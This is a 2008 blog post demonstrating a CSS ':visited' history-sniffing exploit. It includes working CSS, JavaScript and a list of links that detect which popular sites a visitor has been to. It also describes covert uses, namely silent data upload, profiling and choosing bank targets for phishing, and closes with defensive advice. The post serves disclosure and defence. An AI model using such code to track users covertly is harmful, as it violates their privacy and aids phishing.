I can see pages you've been to (slightly sneaky exploit)

I can check to see which websites you've been to from Alexa's Top 100 websites:

A while ago I wrote in my blog about how to check where visitors to your site have been. I thought I'd follow this up with a practical example of this in action.

By setting the 'left' attribute in the CSS (it doesn't have to be 'left', that's just the first one I tried that worked) for the 'a:visited' selector, JavaScript can test links on a page for that same 'left' value to determine if you've been to the link location or not.

This relies on you having your browser's history switched on. If you've disabled your browser's history there is no way for the script to determine where you've been.

Update: (13^th June 08). I've done a little more digging after my initial research, and found 'Spyjax', an article highlighting the same issue, with alternative code doing exactly the same.

**I'd be interested if this DOESN'T work for you. Please email me (ben (at) this domain name) with your browser version**

This code cannot read your entire browser history. I can't receive a list of URLs you've been without providing a complete list of possible URLs to test against. This page takes a list of websites I've provided and checks to see if you've been to any of them. If you have, it will say so on the screen.

The CSS:

<style type="text/css">
<!-- 
#links a {width: 0px; overflow: hidden;}
a {position: absolute;}
a:visited {left: 1px;} /*This is the key to it all, 
			I just need to use JavaScript to 
			check which links have been set 
			a value for style.left*/
//->
</style>
			

The JavaScript:

<script language="JavaScript" type="text/javascript">
onload =function() {
	//Clear the results div
	document.getElementById('results').innerHTML ='';
	
	//Get the links I've listed into an array
	var links =document.getElementById('links').getElementsByTagName('a');
	
	//An array for storing the sites I've visited
	var visited =new Array();
	
	//Identify the pages the user has been to, putting them in the 'visited' array
	for(i =0; i<links.length; i++) if(links[i].offsetLeft==1) visited.push(links[i].href); 
	
	//Reveals the results on page - bit of a hack. Could potentially be replaced with an AJAX function to
	//send data to the server without the user's knowledge
	for(i =0; i<visited.length; i++)
		document.getElementById('results').innerHTML +='You have recently visited: ' + visited[i].link(visited[i]) + '<br />';
}
</script>
			

The HTML (the list of links is shortened here to what's running in the source of this page):

<div id="links">
	<!-- These are the links I'm going to check against -->
	<a href="http://www.yahoo.com/">.</a>
	<a href="http://www.google.com/">.</a>
	<a href="http://www.youtube.com/">.</a>
	<a href="http://www.live.com/">.</a>
	<a href="http://www.msn.com/">.</a>
	<a href="http://www.myspace.com/">.</a>
	<a href="http://www.facebook.com/">.</a>
	<a href="http://www.blogger.com/">.</a>
	<a href="http://www.orkut.com/">.</a>
	<a href="http://www.microsoft.com">.</a>
	<a href="http://www.google.co.in">.</a>
	<a href="http://www.ebay.com/">.</a>
	<a href="http://www.hi5.com/">.</a>
	<a href="http://www.aol.com/">.</a>
	<a href="http://www.google.co.uk/">.</a>
	<a href="http://www.photobucket.com/">.</a>
	<a href="http://www.amazon.com/">.</a>
	<a href="http://www.imdb.com/">.</a>
	<a href="http://www.imageshack.us/">.</a>
</div>
<div id="results"> <!-- Javascript puts the results in here --> </div>
			

On this page I'm not doing anything with the data other than displaying it back to you. I'm also only starting the script when you press the button. If I wanted to, I could put this code in a website, running it as soon as the page loads without you knowing and send the information back to the server.

I could use the information to find your particular market demographic: If you've been visiting gamespot.com and ign.com I could assume you're a male in your teens to mid-thirties (if you're into games). If you've been to facebook.com and not myspace.com you could be a college graduate. If you've been to Study2U.com or Eleraners.com you might be in the market for an online degree.

I could use the information to find out what bank you belong to: If you've been to bankofamerica.com or HSBC I can work out pretty accurately where you bank. If at some point you enter your email address on my site I can target you with some pesky phishing emails.

I can find out which of my competitors' sites you've been to: If I were to operate Study2u.com (which I do), I could run this script (which I don't) and find out if you've been to elearners.com, worldwidelearn.com or any of our other competitors.

Please email comments through to me at ben (at) this domain name. Also it would be great if you could let me know if this script doesn't work for you and you have your browser history enabled (and are viewing the page with JavaScript and CSS switched on).

• Change your history settings to only store websites visited in the last day or two. The shorter your history, the less effective this code will be
• Use a different browser for online banking or anything sensitive. That includes even visiting the homepage of your bank, not just logging into your online banking
• Switch off JavaScript? Not a particularly efficient solution, but it will solve the problem!
Updates:
• Gerald Stuhrberg emailed me: "Just to let you know you can disable this in Firefox by going to about:config, and setting network.http.sendRefererHeader to 0". (17^th June 08) Nicolai Dufva Nielsen wrote "Just to let you know that Gerald Stuhrberg's suggestion will do nothing to your exploit. The firefox network.sendRefererHeader only controls transmission of the source site of a referral link, not whether the browser supports the a:visited pseudo class."
• Jerrery Wilson emailed me: "I think you should add using the NoScript plugin for Firefox to your list of recommendations (possibly as a not to disabling JavaScript). If you've never heard of it you can check out their site here: http://noscript.net/ ... it basically blocks javascript to all pages unless they are on a whitelist (which you specify).